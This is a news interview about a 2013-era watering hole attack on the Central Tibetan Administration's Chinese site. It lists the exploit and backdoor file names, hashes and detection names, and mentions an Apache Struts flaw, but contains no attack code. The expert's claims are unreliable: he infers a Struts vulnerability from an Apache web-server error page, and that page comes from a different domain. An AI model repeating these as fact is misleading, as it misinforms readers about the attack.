On Tuesday, the website of the Central Tibetan Administration (the organisation headed by the Dalai Lama until 2011 and often referred to as the Tibetan Government in Exile) was hacked to infect visitors’ computers with spyware and viruses.
I spoke to internet security expert Michael Good by email about the nature of the hack and who might have been behind it.
Shanghaiist: Can you explain who you are and what you do?
Michael Good: I’m a programming and web security expert. I run the information technology company IT New York. My team is comprised of Certified Ethical Hackers (CEH), Computer Hacking Forensic Investigators (CHFI), Certified Information Systems Security Professionals (CISSP), and Certified Information Systems Auditors (CISA). IT New York’s clients include software companies, venture capital firms, and marketing agencies. We have offices in New York City and Northern Virginia.
SHist: How was the Central Tibetan Administration’s site targeted?
MG: There are lot of hackers out there and you’ll never come to know when they are coming to compromise your website. If your website is vulnerable then it’s a piece of cake for any hacker to compromise the site.
The Central Tibetan Administration site was compromised and infected with malware. The attack carried out is known as “Watering Hole Attack”. In a “Watering Hole Attack,” the attacker compromises a site likely to be visited by a particular target group, rather than attacking the target group directly. Eventually, someone from the targeted group visits the “trusted” site (aka the “Watering Hole”) and becomes compromised.
The site was infected with malicious code and it redirected Chinese speaking visitors to a Java exploit that drops a malicious backdoor. According to [Kurt Baumgartner of Kaspersky Lab], the attack was highly targeted and leveraged an embedded iframe that redirects “xizang-zhiye(dot)org” visitors (the CN-translated version of the site) to a java exploit that maintains a backdoor payload in attempt to infect unsuspecting visitors.
“The Java exploit being delivered is the 212kb “YPVo.jar” (edd8b301eeb083e9fdf0ae3a9bdb3cd6), which archives, drops and executes the backdoor as well,” Baumgartner noted in a blog post on the Kaspersky-run Securelist website. “That file is a 397 kb win32 executable ‘aMCBlHPl.exe’ (a6d7edc77e745a91b1fc6be985994c6a) detected as ‘Trojan.Win32.Swisyn.cyxf’. Backdoors detected with the Swisyn verdict are frequently a part of APT related toolchains, and this one most certainly is.”
SHist: How could the attack have been prevented?
MG: It’s important to do a vulnerability testing and fix all the vulnerabilities to prevent any kind of hacking attack. It’s also important to educate all the administrators of the website about cyber security, like using strong passwords, recognising phishing sites, and avoiding keyloggers and Trojan horses. Standard malware defences are the starting point for defending against watering hole attacks of all varieties. Besides that, it’s better to use secure [virtual machines] to prevent hacks, such as the “Watering Hole” attack.
SHist: What kind of information could have been gained from the attack? Or was the intention to disrupt and annoy rather than to spy?
MG: Since the website is infected with malware, it’s clear that the attacker wanted to spread the malware among visitors. Anyone who visited the infected site will have been infected. Most likely, a Trojan horse was installed on every visitor’s computer, and through that the attacker can steal all usernames, passwords of any websites they visit including email, online banking, social media websites, and can download any personal data and can control the whole computer of that visitor.
Assuming that has happened, and it appears it has, everyone who has visited the Dalai Lama’s Chinese website has lost their privacy. All their personal data is now stored on the attacker’s computer and/or server, and has possibly shared the information with other hackers, perhaps publicly in the deep web [content not indexed by search engines]. The attacker could do anything with that valuable information.
The hacker’s intention was to both annoy and spy on visitors.
SHist: When we spoke originally, you said you had “important information that Kapersky didn’t share”, what is it?
MG: The important information that Kaspersky didn’t share is that the cyber attack on the Dalai Lama reveals a severe vulnerability in Apache. In June 2013, it was estimated that 54 percent of all websites use Apache, an enormous number. All website administrators that use Apache servers need to be aware that malware could be installed on their website without their authorisation.
How did we know that the Dalai Lama’s website used an Apache server? If you type any random letters after http://www.dalailamaworld.com/ then you’ll see an error message something like this :
The requested URL /dalailamaworld.com/(the word you typed ) was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache Server at www.dalailamaworld.com Port 80
SHist: What can an attacker do with that information?
Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions, without any authorisation.
What does this mean to non-technical people? Without the administrator’s login information, a hacker can reveal all the files in your system and compromise its integrity.
If for some reason that doesn’t work, a hacker can easily google and figure out the known vulnerabilities of Apache Server, and there are several.
It is guaranteed that a hacker will get into your website if they really want to. The important thing is to have systems in place to protect your website once the hackers enter.
SHist: Thanks Michael.
[Image credit: @kk]